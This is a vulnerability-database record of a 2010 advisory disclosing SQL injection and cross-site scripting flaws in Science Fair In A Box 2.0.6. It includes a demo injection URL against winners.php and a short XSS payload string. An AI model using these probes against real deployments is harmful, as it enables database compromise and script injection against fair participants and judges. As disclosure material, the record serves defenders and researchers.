DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:47", "references": [], "description": "\nScience Fair In A Box - SQL Injection Cross-Site Scripting", "edition": 1, "reporter": "L0rd CrusAd3r", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-06-09T00:00:00", "title": "Science Fair In A Box - SQL Injection Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-06-09T00:00:00", "id": "EXPLOITPACK:CE4A7FCC53046084A1630F9BC8D90706", "href": "", "viewCount": 7, "sourceData": "Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]\nExploit Title: Science Fair In A Box SQLi & XSS Vulnerability\nVersion:2.0.6\nPrice:Free\nVendor url:http://www.sfiab.ca/\nPublished: 2010-06-09\nGreetz to:Sid3^effects, MaYur, M4n0j, Dark Blue\u2122\u00ae, S1ayer,d3c0d3r and to all\nICW members\n###############################################################################################################################################################################################\n\n\nScience Fair In A Box SQLi & XSS Vulnerability\n\nAuthor: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]\n\n#####################################################################################################################################################################################################\n\nDescription:\n\nThe \"Science Fair in a Box\" (SFIAB) project provides regions hosting a\nscience fair with a complete and comprehensive package that can be used to\nassist in the implementation and running of the fair.\nThe SFIAB provides a web based application to facilitate all areas of\nrunning a science fair such as online registration for the participants,\njudges, sponsor management, judge scheduling and awards management.\nThe SFIAB is implemented using open-source tools wherever possible, creating\na truly open and customizable product that fairs can modify to suit their\nneeds.\nHowever, SFIAB contain enough configuration options to allow fairs to use\nthe system without any modifications to the underlying codebase. SFIAB is\ndeveloped using PHP, with MySQL as the backend database.\nOther database backends could be supported in the future. All reports are\ncreated in print-ready PDF format to ensure cross-platform compatibility\nwhere applicable and also available to export as a CSV to external\napplications.\nAll text in SFIAB is internationalized to allow the use of the system in any\nlanguage. 'Language Packs' will be available in other language once\ntranslations are complete. (If you'd like to assist in translation, contact\nus!)\nSFIAB is the most advanced, most comprehensive Science Fair Software in the\nworld, and is used by many science fairs spread across many different\ncountries!\n#######################################################################################################################################################################################################\n\nVulnerability:\n\n*SQLi Vulnerability\n\nDEMO URL :http://server/sfiab/winners.php?year=2008&type=Special'\n\n*XSS Vulnerability\n\nParameter:'\"-->\n\nDEMO URL :http://server/sfiab/winners.php?year=2008&type=Special [xss]\n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# 0day n0 m0re #\n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\n\n##########################################################################################################################################################################################\n\n-- \nWith R3gards,\nL0rd CrusAd3r", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645674052}}

{}